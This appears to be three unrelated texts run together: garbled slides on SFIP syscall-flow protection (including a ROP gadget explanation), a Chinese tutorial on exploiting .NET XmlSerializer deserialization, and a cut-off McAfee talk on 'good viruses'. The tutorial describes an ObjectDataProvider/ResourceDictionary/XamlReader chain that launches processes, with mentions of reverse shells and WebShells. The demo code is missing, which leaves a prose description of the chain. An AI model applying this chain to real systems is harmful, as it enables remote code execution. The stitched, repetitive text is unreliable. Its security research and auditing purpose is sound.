” : { ”L02” : [ ” s c a n f ” ] , ”L04” : [ ” p r i n t f ” ] , ”L07” : [ ” bar ” ] , ”L09” : [ ” e x i t ” ] , } ” S y s c a l l s ” : { ”L06” : [ read ] } } extract 9 Claudio Canella (@cc0x1f) Syscall Offset Extraction Translation Unit 1 L01 : void func () { .func:39: L02 : asm( ” s y s c a l l ” : : ”a” (39) ) ; . . . .syscall cp:3: L08 : s y s c a l l c p ( close , 0 ) ; L09 : } 10 Claudio Canella (@cc0x1f) Syscall Offset Extraction Translation Unit 1 L01 : void func () { .func:39: L02 : asm( ” s y s c a l l ” : : ”a” (39) ) ; . . . .syscall cp:3: L08 : s y s c a l l c p ( close , 0 ) ; L09 : } Extraction TU 1 ” O f f s e t s ” : { ” func ” : { ”39” : [ L02 ] } } ”Unknown O f f s e t s ” : { ” s y s c a l l c p ” : [ 3 ] } extract 10 Claudio Canella (@cc0x1f) Syscall Offset Extraction Translation Unit 1 L01 : void func () { .func:39: L02 : asm( ” s y s c a l l ” : : ”a” (39) ) ; . . . .syscall cp:3: L08 : s y s c a l l c p ( close , 0 ) ; L09 : } Translation Unit 2 L01 : s y s c a l l c p : . . . L06 : mov %rcx ,% r s i L07 : mov 8(% rsp ) ,%r8 .syscall cp:-1: L08 : s y s c a l l . . . Extraction TU 1 ” O f f s e t s ” : { ” func ” : { ”39” : [ L02 ] } } ”Unknown O f f s e t s ” : { ” s y s c a l l c p ” : [ 3 ] } extract 10 Claudio Canella (@cc0x1f) Syscall Offset Extraction Translation Unit 1 L01 : void func () { .func:39: L02 : asm( ” s y s c a l l ” : : ”a” (39) ) ; . . . .syscall cp:3: L08 : s y s c a l l c p ( close , 0 ) ; L09 : } Translation Unit 2 L01 : s y s c a l l c p : . . . L06 : mov %rcx ,% r s i L07 : mov 8(% rsp ) ,%r8 .syscall cp:-1: L08 : s y s c a l l . . . Extraction TU 1 ” O f f s e t s ” : { ” func ” : { ”39” : [ L02 ] } } ”Unknown O f f s e t s ” : { ” s y s c a l l c p ” : [ 3 ] } Extraction TU 2 ”Unknown S y s c a l l s ” : { ” s y s c a l l c p ” : [ L08 ] } extract 10 Claudio Canella (@cc0x1f) Syscall Offset Extraction Translation Unit 1 L01 : void func () { .func:39: L02 : asm( ” s y s c a l l ” : : ”a” (39) ) ; . . . .syscall cp:3: L08 : s y s c a l l c p ( close , 0 ) ; L09 : } Translation Unit 2 L01 : s y s c a l l c p : . . . L06 : mov %rcx ,% r s i L07 : mov 8(% rsp ) ,%r8 .syscall cp:-1: L08 : s y s c a l l . . . Extraction TU 1 ” O f f s e t s ” : { ” func ” : { ”39” : [ L02 ] } } ”Unknown O f f s e t s ” : { ” s y s c a l l c p ” : [ 3 ] } Extraction TU 2 ”Unknown S y s c a l l s ” : { ” s y s c a l l c p ” : [ L08 ] } Linker ” O f f s e t s ” : { ” func ” : { ”39” : [ L02 ] } , ” s y s c a l l c p ” : { ”3” : [ L08 ] } } extract merge 10 Claudio Canella (@cc0x1f) State Machine Generation 11 Claudio Canella (@cc0x1f) State Machine Generation 11 Claudio Canella (@cc0x1f) State Machine Generation merge 11 Claudio Canella (@cc0x1f) State Machine Generation main Info main C a l l Targets : { ”L56” : [ foo1 ] , ”L59” : [ foo2 ] } Last Syscalls State Machine 11 Claudio Canella (@cc0x1f) State Machine Generation main foo1 Info foo1 C a l l Targets : { ”L03” : [ bar1 ] } S y s c a l l s : { ”L02” : [ open ] } Last Syscalls State Machine 11 Claudio Canella (@cc0x1f) State Machine Generation main foo1 Info foo1 C a l l Targets : { ”L03” : [ bar1 ] } S y s c a l l s : { } Last Syscalls open State Machine 11 Claudio Canella (@cc0x1f) State Machine Generation main foo1 bar1 Info bar1 S y s c a l l s : { ”L12” : [ read ] } Last Syscalls open State Machine 11 Claudio Canella (@cc0x1f) State Machine Generation main foo1 bar1 Info bar1 S y s c a l l s : { ”L12” : [ read ] } Last Syscalls open State Machine open: [read] 11 Claudio Canella (@cc0x1f) State Machine Generation main foo1 bar1 Info bar1 S y s c a l l s : { } Last Syscalls read State Machine open: [read] 11 Claudio Canella (@cc0x1f) State Machine Generation main foo1 Info foo1 C a l l Targets : { } S y s c a l l s : { } Last Syscalls read State Machine open: [read] 11 Claudio Canella (@cc0x1f) State Machine Generation main Info main C a l l Targets : { ”L59” : [ foo2 ] } Last Syscalls read State Machine open: [read] 11 Claudio Canella (@cc0x1f) State Machine Generation main foo2 Info foo2 C a l l Targets : { ”L179” : [ bar2 ] } S y s c a l l s : { ”L178” : [ open ] } Last Syscalls read State Machine open: [read] 11 Claudio Canella (@cc0x1f) State Machine Generation main foo2 Info foo2 C a l l Targets : { ”L179” : [ bar2 ] } S y s c a l l s : { ”L178” : [ open ] } Last Syscalls read State Machine open: [read] read: [open] 11 Claudio Canella (@cc0x1f) State Machine Generation main foo2 Info foo2 C a l l Targets : { ”L179” : [ bar2 ] } S y s c a l l s : { } Last Syscalls open State Machine open: [read] read: [open] 11 Claudio Canella (@cc0x1f) State Machine Generation main foo2 bar2 Info bar2 S y s c a l l s : { ”L162” : [ s t a t ] } Last Syscalls open State Machine open: [read] read: [open] 11 Claudio Canella (@cc0x1f) State Machine Generation main foo2 bar2 Info bar2 S y s c a l l s : { } Last Syscalls stat State Machine open: [read,stat] read: [open] 11 Claudio Canella (@cc0x1f) State Machine Generation main foo2 Info foo2 C a l l Targets : { } S y s c a l l s : { } Last Syscalls stat State Machine open: [read,stat] read: [open] 11 Claudio Canella (@cc0x1f) State Machine Generation main Info main C a l l Targets : { } Last Syscalls stat State Machine open: [read,stat] read: [open] 11 Claudio Canella (@cc0x1f) Enforcement Library • extracts information 12 Claudio Canella (@cc0x1f) Enforcement Library • extracts information • makes offset adjustment 12 Claudio Canella (@cc0x1f) Enforcement Library • extracts information • makes offset adjustment Kernel • performs transition check 12 Claudio Canella (@cc0x1f) Enforcement Library • extracts information • makes offset adjustment Kernel • performs transition check • performs independent origin check 12 Claudio Canella (@cc0x1f) Evaluation Performance 13 Claudio Canella (@cc0x1f) Evaluation Performance Security 13 Claudio Canella (@cc0x1f) Microbenchmark None Seccomp State Origin Combined 0 200 400 302 348 326 329 341 292 336 320 320 332 Cycles average min 14 Claudio Canella (@cc0x1f) Macrobenchmark ffmpeg nginx memcached 0 0.5 1 1.5 +3.93 % +1.08 % +0.5 % +2.98 % +1.2 % +0.34 % +1.81 % +1.52 % +1.06 % Normalized Overhead State Sysloc Combined 15 Claudio Canella (@cc0x1f) State Machine Analysis Application Average Transitions #States busybox 15.99 23.52 coreutils 16.66 26.64 pwgen 13.56 18 muraster 18.89 29 nginx 74.05 107 ffmpeg 49.07 55 memcached 43.16 86 mutool 32.26 53 16 Claudio Canella (@cc0x1f) State Machine Analysis Application Average Transitions #States busybox 15.99 23.52 coreutils 16.66 26.64 pwgen 13.56 18 muraster 18.89 29 nginx 74.05 107 ffmpeg 49.07 55 memcached 43.16 86 mutool 32.26 53 16 Claudio Canella (@cc0x1f) Origin Analysis Application Total #Offsets Avg #Offsets busybox 102.64 3.75 coreutils 116.71 4.42 pwgen 84 4.42 muraster 193 4.6 nginx 318 3.0 ffmpeg 279 4.98 memcached 317 3.69 mutool 278 4.15 17 Claudio Canella (@cc0x1f) Origin Analysis Application Total #Offsets Avg #Offsets busybox 102.64 3.75 coreutils 116.71 4.42 pwgen 84 4.42 muraster 193 4.6 nginx 318 3.0 ffmpeg 279 4.98 memcached 317 3.69 mutool 278 4.15 17 Claudio Canella (@cc0x1f) Return-oriented programming • Use exisiting code to exploit a program 18 Claudio Canella (@cc0x1f) Return-oriented programming • Use exisiting code to exploit a program • Jumps to parts of functions (so called gadgets) 18 Claudio Canella (@cc0x1f) Return-oriented programming • Use exisiting code to exploit a program • Jumps to parts of functions (so called gadgets) • These gadgets are assembler instructions followed by a ret • pop RDI; retq • syscall; retq • add RSP, 8; retq 18 Claudio Canella (@cc0x1f) Return-oriented programming • Use exisiting code to exploit a program • Jumps to parts of functions (so called gadgets) • These gadgets are assembler instructions followed by a ret • pop RDI; retq • syscall; retq • add RSP, 8; retq • Gadgets are chained together for an exploit 18 Claudio Canella (@cc0x1f) Return-oriented programming • Use exisiting code to exploit a program • Jumps to parts of functions (so called gadgets) • These gadgets are assembler instructions followed by a ret • pop RDI; retq • syscall; retq • add RSP, 8; retq • Gadgets are chained together for an exploit • Overwrite the stack with gadget addresses and parameters 18 Claudio Canella (@cc0x1f) Return-oriented programming Stack return address 3 value2 value1 return address 2 SP → return address 1 Register RSI RDI Program code asm instruction ret Gadget 1 ... pop rsi pop rdi ret Gadget 2 ... syscall ret Gadget 3 ... 19 Claudio Canella (@cc0x1f) Return-oriented programming Stack return address 3 value2 value1 SP → return address 2 return address 1 Register RSI RDI Program code IP → asm instruction ret Gadget 1 ... pop rsi pop rdi ret Gadget 2 ... syscall ret Gadget 3 ... 19 Claudio Canella (@cc0x1f) Return-oriented programming Stack return address 3 value2 value1 SP → return address 2 return address 1 Register RSI RDI Program code asm instruction IP → ret Gadget 1 ... pop rsi pop rdi ret Gadget 2 ... syscall ret Gadget 3 ... 19 Claudio Canella (@cc0x1f) Return-oriented programming Stack return address 3 value2 SP → value1 return address 2 return address 1 Register RSI RDI Program code asm instruction ret Gadget 1 ... IP → pop rsi pop rdi ret Gadget 2 ... syscall ret Gadget 3 ... 19 Claudio Canella (@cc0x1f) Return-oriented programming Stack return address 3 SP → value2 value1 return address 2 return address 1 Register RSI value1 RDI Program code asm instruction ret Gadget 1 ... pop rsi IP → pop rdi ret Gadget 2 ... syscall ret Gadget 3 ... 19 Claudio Canella (@cc0x1f) Return-oriented programming Stack SP → return address 3 value2 value1 return address 2 return address 1 Register RSI value1 RDI value2 Program code asm instruction ret Gadget 1 ... pop rsi pop rdi IP → ret Gadget 2 ... syscall ret Gadget 3 ... 19 Claudio Canella (@cc0x1f) Return-oriented programming Stack return address 3 value2 value1 return address 2 return address 1 Register RSI value1 RDI value2 Program code asm instruction ret Gadget 1 ... pop rsi pop rdi ret Gadget 2 ... IP → syscall ret Gadget 3 ... 19 Claudio Canella (@cc0x1f) Return-oriented programming Stack return address 3 value2 value1 return address 2 return address 1 Register RSI value1 RDI value2 Program code asm instruction ret Gadget 1 ... pop rsi pop rdi ret Gadget 2 ... syscall IP → ret Gadget 3 ... 19 Claudio Canella (@cc0x1f) Return-oriented programming Gadgets are often unintended • Consider the byte sequence 05 5a 5e 5f c3 20 Claudio Canella (@cc0x1f) Return-oriented programming Gadgets are often unintended • Consider the byte sequence 05 5a 5e 5f c3 • It disassembles to add eax , 0xc35f5e5a 20 Claudio Canella (@cc0x1f) Return-oriented programming Gadgets are often unintended • Consider the byte sequence 05 5a 5e 5f c3 • It disassembles to add eax , 0xc35f5e5a • However, if we skip the first byte, it disassembles to pop rdx pop rsi pop rdi ret 20 Claudio Canella (@cc0x1f) Return-oriented programming Gadgets are often unintended • Consider the byte sequence 05 5a 5e 5f c3 • It disassembles to add eax , 0xc35f5e5a • However, if we skip the first byte, it disassembles to pop rdx pop rsi pop rdi ret • This property is due to non-aligned, variable-width opcodes 20 Claudio Canella (@cc0x1f) Return-oriented programming Syscall instruction has byte sequence 0f 05 → easy to find unaligned syscall instructions 21 Claudio Canella (@cc0x1f) Return-oriented programming Syscall instruction has byte sequence 0f 05 → easy to find unaligned syscall instructions SFIP restricts ROP chains via 21 Claudio Canella (@cc0x1f) Return-oriented programming Syscall instruction has byte sequence 0f 05 → easy to find unaligned syscall instructions SFIP restricts ROP chains via • syscall origins → unaligned instructions not possible 21 Claudio Canella (@cc0x1f) Return-oriented programming Syscall instruction has byte sequence 0f 05 → easy to find unaligned syscall instructions SFIP restricts ROP chains via • syscall origins → unaligned instructions not possible • syscall transitions → not every sequence is possible 21 Claudio Canella (@cc0x1f) Return-oriented programming Syscall instruction has byte sequence 0f 05 → easy to find unaligned syscall instructions SFIP restricts ROP chains via • syscall origins → unaligned instructions not possible • syscall transitions → not every sequence is possible Conclusion SFIP imposes significant constraints on control-flow-hijacking attacks 21 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open no-op1 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open fstat no-op1 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open fstat no-op1 no-op2 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open fstat write no-op1 no-op2 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open fstat write no-op1 no-op2 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open fstat write no-op1 no-op2 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open fstat write no-op1 no-op2 22 Claudio Canella (@cc0x1f) Mimicry Attacks Detection Policy open fstat write Mimicry Attack open fstat write no-op1 no-op2 22 Claudio Canella (@cc0x1f) In the near future... Coarse- to Fine-Grained SFIP Location A Location B Function foo1 0x01 : . . . 0x02 : s y s c a l l ( open , . . . ) ; 0x03 : bar1 () ; 0x04 : . . . Function foo2 0xb1 : . . . 0xb2 : s y s c a l l ( open , . . . ) ; 0xb3 : bar2 () ; 0xb4 : . . . Function bar1 0x11 : . . . 0x12 : s y s c a l l ( read , . . . ) ; 0x13 : return ; Function bar2 0xa1 : . . . 0xa2 : s y s c a l l ( stat , . . . ) ; 0xa3 : return ; SFIP t r a n s i t i o n s : { ”open” : [ read , s t a t ] } o r i g i n s : { ”open” : [0 x02 , 0xb2 ] , ” read ” : [0 x12 ] , ” s t a t ” : [0 xa2 ] } 23 Claudio Canella (@cc0x1f) Coarse- to Fine-Grained SFIP Location A Location B Function foo1 0x01 : . . . 0x02 : s y s c a l l ( open , . . . ) ; 0x03 : bar1 () ; 0x04 : . . . Function foo2 0xb1 : . . . 0xb2 : s y s c a l l ( open , . . . ) ; 0xb3 : bar2 () ; 0xb4 : . . . Function bar1 0x11 : . . . 0x12 : s y s c a l l ( read , . . . ) ; 0x13 : return ; Function bar2 0xa1 : . . . 0xa2 : s y s c a l l ( stat , . . . ) ; 0xa3 : return ; SFIP t r a n s i t i o n s : { ”open” : [ read , s t a t ] } o r i g i n s : { ”open” : [0 x02 , 0xb2 ] , ” read ” : [0 x12 ] , ” s t a t ” : [0 xa2 ] } 23 Claudio Canella (@cc0x1f) Coarse- to Fine-Grained SFIP Location A Location B Function foo1 0x01 : . . . 0x02 : s y s c a l l ( open , . . . ) ; 0x03 : bar1 () ; 0x04 : . . . Function foo2 0xb1 : . . . 0xb2 : s y s c a l l ( open , . . . ) ; 0xb3 : bar2 () ; 0xb4 : . . . Function bar1 0x11 : . . . 0x12 : s y s c a l l ( read , . . . ) ; 0x13 : return ; Function bar2 0xa1 : . . . 0xa2 : s y s c a l l ( stat , . . . ) ; 0xa3 : return ; Coarse-grained SFIP t r a n s i t i o n s : { ”open” : [ read , s t a t ] } o r i g i n s : { ”open” : [0 x02 , 0xb2 ] , ” read ” : [0 x12 ] , ” s t a t ” : [0 xa2 ] } 23 Claudio Canella (@cc0x1f) Coarse- to Fine-Grained SFIP Location A Location B Function foo1 0x01 : . . . 0x02 : s y s c a l l ( open , . . . ) ; 0x03 : bar1 () ; 0x04 : . . . Function foo2 0xb1 : . . . 0xb2 : s y s c a l l ( open , . . . ) ; 0xb3 : bar2 () ; 0xb4 : . . . Function bar1 0x11 : . . . 0x12 : s y s c a l l ( read , . . . ) ; 0x13 : return ; Function bar2 0xa1 : . . . 0xa2 : s y s c a l l ( stat , . . . ) ; 0xa3 : return ; Fine-grained SFIP t r a n s i t i o n s : { ”open@0x02” : [ read@0x12 ] , ”open@0xb2” : [ stat@0xa2 ] , } 23 Claudio Canella (@cc0x1f) Coarse- to Fine-Grained SFIP Location A Location B Function foo1 0x01 : . . . 0x02 : s y s c a l l ( open , . . . ) ; 0x03 : bar1 () ; 0x04 : . . . Function foo2 0xb1 : . . . 0xb2 : s y s c a l l ( open , . . . ) ; 0xb3 : bar2 () ; 0xb4 : . . . Function bar1 0x11 : . . . 0x12 : s y s c a l l ( read , . . . ) ; 0x13 : return ; Function bar2 0xa1 : . . . 0xa2 : s y s c a l l ( stat , . . . ) ; 0xa3 : return ; Fine-grained SFIP t r a n s i t i o n s : { ”open@0x02” : [ read@0x12 ] , ”open@0xb2” : [ stat@0xa2 ] , } 23 Claudio Canella (@cc0x1f) Coarse- to Fine-Grained SFIP Location A Location B Function foo1 0x01 : . . . 0x02 : s y s c a l l ( open , . . . ) ; 0x03 : bar1 () ; 0x04 : . . . Function foo2 0xb1 : . . . 0xb2 : s y s c a l l ( open , . . . ) ; 0xb3 : bar2 () ; 0xb4 : . . . Function bar1 0x11 : . . . 0x12 : s y s c a l l ( read , . . . ) ; 0x13 : return ; Function bar2 0xa1 : . . . 0xa2 : s y s c a l l ( stat , . . . ) ; 0xa3 : return ; Fine-grained SFIP t r a n s i t i o n s : { ”open@0x02” : [ read@0x12 ] , ”open@0xb2” : [ stat@0xa2 ] , } 23 Claudio Canella (@cc0x1f) Proof-of-Concept You can find our proof-of-concept implementation of SysFlow on: • https://github.com/SFIP/SFIP 24 Claudio Canella (@cc0x1f) More Details More details in the paper • More implementation details • More extensive security discussion • . . . [Can+22] Claudio Canella, Sebastian Dorn, Daniel Gruss, Michael Schwarz. SFIP: Coarse-Grained Syscall-Flow-Integrity Protection in Modern Systems. 25 Claudio Canella (@cc0x1f) Recap SFIP provides • integrity to user-kernel transitions 26 Claudio Canella (@cc0x1f) Recap SFIP provides • integrity to user-kernel transitions • security via syscall transition and origin checks 26 Claudio Canella (@cc0x1f) Recap SFIP provides • integrity to user-kernel transitions • security via syscall transition and origin checks and • is fully automatized 26 Claudio Canella (@cc0x1f) Recap SFIP provides • integrity to user-kernel transitions • security via syscall transition and origin checks and • is fully automatized • has minimal runtime overhead 26 Claudio Canella (@cc0x1f) Go With the Flow Enforcing Program Behavior Through Syscall Sequences and Origins Claudio Canella (@cc0x1f) August 11, 2022 Graz University of Technology References [Can+22] C. Canella, S. Dorn, D. Gruss, and M. Schwarz. SFIP: Coarse-Grained Syscall-Flow-Integrity Protection in Modern Systems. In: arXiv:2202.13716 (2022). 27 Claudio Canella (@cc0x1f)
云影实验室 1 / 12 .NET 高级代码审计(第一课)XmlSerializer 反序列漏洞 Ivan1ee@360 云影实验室 2019 年 03 月 01 日 云影实验室 2 / 12 0X00 前言 在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据 映射为 .NET 对象。XmlSerializer 类在程序中通过单个 API 调用来执行 XML 文档和对 象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人 员使用 Type 类的静态方法获取外界数据,并调用 Deserialize 反序列化 xml 数据就会 触发反序列化漏洞攻击(例如 DotNetNuke 任意代码执行漏洞 CVE-2017-9822),本 文笔者从原理和代码审计的视角做了相关脑图介绍和复现。 0X01 XmlSerializer 序列化 .NET 框架中 System.Xml.Serialization 命名空间下的 XmlSerializer 类可以将 XML 文 档绑定到 .NET 类的实例,有一点需要注意它只能把对象的公共属性和公共字段转换为 XML 元素或属性,并且由两个方法组成:Serialize() 用于从对象实例生成 XML; Deserialize() 用于将 XML 文档分析成对象图,被序列化的数据可以是数据、字段、数 组、以及 XmlElement 和 XmlAttribute 对象格式的内嵌 XML。具体看下面 demo 云影实验室 3 / 12 XmlElement 指定属性要序列化为元素,XmlAttribute 指定属性要序列化为特性, XmlRoot 特性指定类要序列化为根元素;通过特性类型的属性、影响要生成的名称、 名称空间和类型。再创建一个 TestClass 类的实例填充其属性序列化为文件, XmlSerializer.Serialize 方法重载可以接受 Stream、TextWrite、XmlWrite 类,最终 生成的 XML 文件列出了 TestClass 元素、Classname 特性和其它存储为元素的属性: 0x02 XmlSerialize 反序列化 反序列过程:将 xml 文件转换为对象是通过创建一个新对象的方式调用 XmlSerializer.Deserialize 方法实现的,在序列化最关键的一环当属 new XmlSerializer 构造方法里所传的参数,这个参数来自 System.Type 类,通过这个类可 以访问关于任意数据类型的信息,指向任何给定类型的 Type 引用有以下三种方式。 云影实验室 4 / 12 2.1、typeof 实例化 XmlSerializer 传入的 typeof(TestClass) 表示获取 TestClass 类的 Type, typeof 是 C#中的运算符,所传的参数只能是类型的名称,而不能是实例化的对象,如 下 Demo 通过 typeof 获取到 Type 之后就能得到该类中所有的 Methods、Members 等信息。 下图运行 Debug 时,弹出消息对话框显示当前成员 Name 的值。 2.2、object.Type 在.NET 里所有的类最终都派生自 System.Object,在 Object 类中定义了许多公有和受 保护的成员方法,这些方法可用于自己定义的所有其他类中,GetType 方法就是其中的 一个,该方法返回从 System.Type 派生的类的一个实例,因为可以提供对象成员所属类 的信息,包括基本类型、方法、属性等,上述案例中实例化 TestClass,再获取当前实 例的 Type,如下 Demo 云影实验室 5 / 12 2.3、Type.GetType 第三种方法是 Type 类的静态方法 GetType,这个方法允许外界传入字符串,这是重大 利好,只需要传入全限定名就可以调用该类中的方法、属性等 Type.GetType 传入的参数也是反序列化产生的漏洞污染点,接下来就是要去寻找可以 被用来攻击使用的类。 0X03 打造攻击链 首先放上攻击链打造成功后的完整 Demo,这段 Demo 可以复用在任意地方(这里不 涉及.NET Core、MVC),如下图 只要 XmlSerializer 存在反序列化漏洞就可用下面 Demo 中的内容,涉及到三个主要的 技术点,以下分别来介绍原理。 3.1、ObjectDataProvider ObjectDataProvider 类,它位于 System.Windows.Data 命名空间下,可以调用任意 被引用类中的方法,提供成员 ObjectInstance 用类似实例化类、成员 MethodName 云影实验室 6 / 12 调用指定类型的方法的名称、成员 MethodParameters 表示传递给方法的参数,参考 下图 再给 TestClass 类定义一个 ClassMethod 方法,代码实现调用 System.Diagnostics.Process.Start 启动新的进程弹出计算器。如果用 XmlSerializer 直接序列化会抛出异常,因为在序列化过程中 ObjectInstance 这个成员类型未知,不 过可以使用 ExpandedWrapper 扩展类在系统内部预先加载相关实体的查询来避免异 常错误,改写 Demo 生成 data.xml 内容如下: 攻击链第一步就算完成,但美中不足的是因笔者在测试环境下新建的 TestClass 类存在 漏洞,但在生产情况下是非常复杂的,需要寻求 Web 程序中存在脆弱的攻击点,为了 使攻击成本降低肯定得调用系统类去达到命令执行,所以需要引入下面的知识。 3.2、ResourceDictionary ResourceDictionary,也称为资源字典通常出现在 WPF 或 UWP 应用程序中用来在多 个程序集间共享静态资源。既然是 WPF 程序,必然设计到前端 UI 设计语言 XAML。 XAML 全称 Extensible Application Markup Language (可扩展应用程序标记语言) 基 云影实验室 7 / 12 于 XML 的,且 XAML 是以一个树形结构作为整体,如果对 XML 了解的话,就能很快 的掌握,例如看下面 Demo  第一个标签 ResourceDictionary,xmlns:Runtime 表示读取 System.Diagnostics 命令空间的名称起个别名为 Runtime  第二个标签 ObjectDataProvider 指定了三个属性,x:key 便于条件检索,意义不 大但必须得定义;ObjectType 用来获取或设置要创建其实例的对象的类型,并使 用了 XAML 扩展;x:Type 相当于 C#中 typeof 运算符功能,这里传递的值是 System.Diagnostics.Process; MethodName 用来获取或设置要调用的方法的名 称,传递的值为 System.Diagnostics.Process.Start 方法用来启动一个进程。  第三个标签 ObjectDataProvider.MethodParameters 内嵌了两个方法参数标签, 通过 System:String 分别指定了启动文件和启动时所带参数供 Start 方法使用。 介绍完攻击链中 ResourceDictionary 后,攻击的 Payload 主体已经完成,接下来通过 XamlReader 这个系统类所提供的 XML 解析器来实现攻击。 3.3、XamlReader XamlReader 位于 System.Windows.Markup 空间下,顾名思义就是用来读取 XAML 文件,它是默认的 XAML 读取器,通过 Load 读取 Stream 流中的 XAML 数据,并返 回作为根对象,而另外一个 Parse 方法读取指定字符串中的 XAML 输入,也同样返回 作为根对象,自然 Parse 方法是我们关心和寻求的。 云影实验室 8 / 12 只需使用 ObjectDataProvider 的 ObjectInstance 方法实例化 XamlReader,再指定 MethodName 为 Parse,并且给 MethodParameters 传递序列化之后的资源字典数 据,这样就可以完成 XmlSerializer 反序列化攻击链的打造。 0x04 代码审计视角 从代码审计的角度其实很容易找到漏洞的污染点,通过前面几个小节的知识能发现 序 列化需要满足一个关键条件 Type.GetType,程序必须通过 Type 类的静态方法 GetType,例如以下 demo 云影实验室 9 / 12 首先创建 XmlDocument 对象载入 xml,变量 typeName 通过 Xpath 获取到 Item 节 点的 type 属性的值,并传给了 Type.GetType,紧接着读取 Item 节点内的所有 Xml 数据,最终交给 Deserialize 方法反序列化,这是一个近乎完美的利用点。再来看笔者 在 github 上收集到的 XmlSerializer 反序列化类:XmlSerializeUtil.cs 此处值参数类型为 Type,代码本身没有问题,问题在于程序开发者可能会先定义一个 字符串变量来接受传递的 type 值,通过 Type.GetType(string)返回 Type 对象再传递 进 DeserializeXml,在代码审计的过程中也需要关注此处 type 的来源。 0x05 案例复盘 最后再通过下面案例来复盘整个过程,全程展示在 VS 里调试里通过反序列化漏洞弹出 计算器。 1. 输入 http://localhost:5651/Default?node=root&value=type 加载了远程的 ( 1.xml 文件 云影实验室 10 / 12 2. 通过 xmlHelper.GetValue 得到 root 节点下的所有 XML 数据 3. 这步最关键,得到 root 节点的 type 属性,并提供给 GetType 方法, XmlSerializer 对象实例化成功 云影实验室 11 / 12 4. XmlSerializer.Deserialize(xmlReader) 成功调出计算器 最后附上动图 0x06 总结 由于 XmlSerializer 是系统默认的反序列类,所以在实际开发中使用率还是比较高的, 攻击者发现污染点可控的时候,可以从两个维度去寻找利用的点,第一从 Web 应用程 序中寻求可以执行命令或者写 WebShell 的类和方法;第二就是本文中所说的利用 ObjectDataProvider、ResourceDictionary、XamlReader 组成的攻击链去执行命令 或者反弹 Shell ,最后.NET 反序列化系列课程笔者会同步到 https://github.com/Ivan1ee/ 、https://ivan1ee.gitbook.io/ ,后续笔者将陆续推出 高质量的.NET 反序列化漏洞文章 ,大致课程大纲如下图 云影实验室 12 / 12 欢迎大伙持续关注,交流。
Good Viruses. Evaluating the Risks. Dr. Igor Muttik | Senior Architect | McAfee | Avert Labs® 2 Good viruses • It is just technology – neither bad nor good • What could make it dangerous: — Lack of control — Wide availability • If it is dangerous – it’s bad — “Atomic bomb” is bad — “Splitting the atom”? — “Chain reaction”? (worst because control is lost) • Can a virus be written accidentally? • Can a good virus get out of control? 3 Agenda • “Good virus” idea keeps coming up • Already.71 – a tool and a virus (disassembly and operation) • “Corrupted blood” epidemic in WoW (video) • W32/Nachi – worm that exploited and patched a vulnerability • Pros and cons of harnessing replicating code • Conclusions 4 Google search for “good virus” and “bad virus” • People are very receptive to “a good virus” idea • A lot of “bad virus” searches are emotional (“horrible” and ”awful”) 5 ALREADY.COM – a tool and a worm! 6 ALREADY.COM tool usage @echo off rem Start of AUTOEXEC.BAT file rem Opening commands always execute ALREADY.COM IF ERRORLEVEL 1 GOTO skip rem Things to do once a day go here :skip rem Following commands always execute 7 Already.71 – just 71 (0x47) bytes 8 Already.71 – get current date (1st block of 3) 9 Already.71 – compare (2nd block of 3) 10 Already.71 – write itself to disk (3rd block) 11 How does Already.71 spread? Due to “current folder” concept. 12 A tool 13 Empty folder 14 Execution 15 Replicant! 16 What did we learn? • Probability of a mistake grows when insecure programming techniques are used: — Self-modifying code — Modifying other programs on disk or in memory — Using exploits • Insecure environments are unexpectedly common 17 “Corrupted blood” incident in WoW 18 “Corrupted blood” epidemic (Sep 2005) • Zul’Gurub instance dungeon (added in WoW 1.7 for 60+ lvl players): 19 “Hakkar the Soulflayer” monster • Casts a powerful “Corrupted blood” spell • Infectious! • Epidemic started 20 What went wrong? • Timeline — WoW 1.7 went out on 13 Sep 2005 — Epidemics started on several servers on 15 Sep 2005 — Source - Hakkar monster from Zul’Gurub instance dungeon • “Corrupted blood” - spell parameters: — Damage: 200 HP (60+ level players have 4000-5000 HP) — Duration: 10 sec (every 2 seconds) — Radius: 100 yards (infectious with 100% probability!) — By design it should be very limited in time and space… — But spreads from a player to a player (+ NPCs and pets) • And could be “conserved” in an un-summoned pet! — A design oversight (due to environment complexity) 21 Corrupted blood disease in WoW • Infected Ironforge city: 22 Corrupted blood disease (video) • Corpses in the city: 23 Dead characters everywhere (skeletons) • Fortunately, in WoW death is “temporary” • Game was effectively unplayable for many days – a lot of upset users 24 Reaction • Official reaction while preparing a patch: • Many players excited: ”first proper world event” • Fix in 1.8 (10 Oct 2005): “Fixed a bug that would allow Hakkar's Corrupted Blood ability to target pets.” • Fix in 1.9.3 (07 Feb 2006): “Corrupted Blood now deals direct damage with a following damage over time effect and no longer spreads to others in the raid.” 25 What did we learn? • Replication went out of control (Chernobyl!) • If it is implemented in a complex environment it is hard to predict all possible scenarios — To some extent Already.71 too — The Morris worm — Internet is a lot more complex 26 W32/Nachi – a vulnerability-patching worm. 27 W32/Nachi (aka W32/Welchia) • W32/MSBlaster (aka LovSan) – 11 Aug 2003 • W32/Nachi – released 18 Aug 2003 — Contains code to download and run Microsoft’s patch for MS03-026 RpcDcom vulnerability — Overloaded many networks — But, to give credit to the author, was time-limited (removes itself in 2004) — At the time of its “suicide” ~30,000 IPs had W32/Nachi 28 What did we learn? • Beneficial worms can and will contain bugs • W32/Nachi lacked control in two areas — Network load — Did not die as quickly as was expected • Internet is a very complex environment 29 To be or not to be? Pros and cons. 30 Pro and contra • Dr. Bontchev’s «Are "Good" Computer Viruses Still a Bad Idea?» 1994 paper: — A useful worm can be created but with all the controls in place most people would not consider it to be a virus • Arguments for: — Compress/encrypt files/disks — “Maintenance” worm — 